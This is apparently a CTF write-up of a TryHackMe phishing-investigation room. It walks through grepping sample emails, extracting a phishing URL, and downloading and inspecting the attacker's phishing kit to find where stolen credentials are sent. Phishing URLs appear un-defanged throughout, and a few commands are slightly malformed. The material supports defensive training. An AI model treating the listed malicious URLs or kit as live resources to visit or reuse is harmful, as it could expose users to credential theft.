THM
A collection of my write-ups for TryHackMe, HackTheBox, and other CTF challenges
Project maintained by UphillPush Hosted on GitHub Pages — Theme by mattgraham
Snapped-Phish-ing-Line
An Ordinary Midsummer Day…
As an IT department personnel of SwiftSpend Financial, one of your responsibilities is to support your fellow employees with their technical concerns. While everything seemed ordinary and mundane, this gradually changed when several employees from various departments started reporting an unusual email they had received. Unfortunately, some had already submitted their credentials and could no longer log in.
You now proceeded to investigate what is going on by:
- Analysing the email samples provided by your colleagues.
- Analysing the phishing URL(s) by browsing it using Firefox.
- Retrieving the phishing kit used by the adversary.
- Using CTI-related tooling to gather more information about the adversary.
- Analysing the phishing kit to gather more information about the adversary.
Note: The phishing emails to be analysed are under the phish-emails directory on the Desktop. Usage of a web browser, text editor and some knowledge of the grep command will help.
Answer the questions below
Who is the individual who received an email attachment containing a PDF?
First, open the phish-emails dir on the desktop and right-click open terminal here, then we need to search for the file that contains the pdf attachment. This can be achieved through the command
grep -l 'name=".*\pdf"' *.eml
This will return the name of the eml file that has a pdf attachment. We want to find out who received that pdf. The command is tunneled with xargs to view how this email was sent to in the command below
grep -l 'name=".*\pdf"' *.eml | xargs -d '\n' "To:"
William McClean
The sender name of all files can be displayed with grep command too, as follows
grep -h -A 1 "^From:" *.eml"Where
-his used to hide the file name
-Afor displaying the line after the search keyword and the lines after, depending on the number follows
1number of lines to display after the line match
For this question, we have to open the email sent to Zoe and download the attached html to inspect it
Now, the html file must be inspected for any url inside it, which can be done through the commnad
grep "http[^ ]" *.html
So the URL is:
http://kennaroads.buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe.duncan@swiftspend.finance&error
This URL has to be defanged as required in the question, so Cyberchef was used to do it:
The phishing URL sent to Zeo has a specific path to her, but if we remove the path related to the user, it will direct us to some files it’s hosting
so for the link:
http://kennaroads.buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe.duncan@swiftspend.finance&error
we will just keep the main path:
http://kennaroads.buzz/data/Update365/
There is no.zipfile here, so going back a bit to the link:
http://kennaroads.buzz/data
show us this page
Now, we can clearly see the .zip archive of the phishing kit, which is Update365.zip
so the link we are looking for is:
http://kennaroads.buzz/data/Update365.zip
defang this URL using CyberChef:
Download the Update365.zip in the phish-emails dir, then in the terminal write the command:
sha256sum Update365.zip
Using an open-source, popular tool for investigating viruses, VirusTotal is the best option.
In my browser, I visited virustotal page and inserted the archive sha256 hash to scan it, and easily saw the submission date
The best way to track the login attempts is through logs, and in previous questions its know where are the hosting files
so back again to the link:
http://kennaroads.buzz/data
a log.txt file is seen, open it and try to look up for repeated email or password
To know this we have to investigate more in the phishing kit archive, heading back to the host website at:
http://kennaroads.buzz/data/Update365.zip
the Update365.zip is downloaded, then we move it to the phish-emails dir to investigate it using the command
mv ~/Downloads/Update365.zip .
Then Unzip it using the command
unzip Update365.zip
The file that collects emails and send it have the word send in it for sure and is in the Update365 folder, so searching for files that contain the send keyword using the command
grep -r "*send"
we found
The submit.php is the file responsible for the submit button, to further investigate it we tunneled the command with cat
Here, another suspicious email is found, and the responses are sent to whom is
This one is easy, you just have to search for an email that ends with @gmail.com using the command:
grep -r "@gmail.com"
Reading the instruction for this one :
Then the flag is a text file that is a subdomain or a directory of the phishing URL, since there is no enumeration tool in the VM like Gobuster, I guessed its called flag.txt
so I tried this directory in the URL :
So the flag is found, but it seems to be encoded. For that, we will use CyberChef to decode it back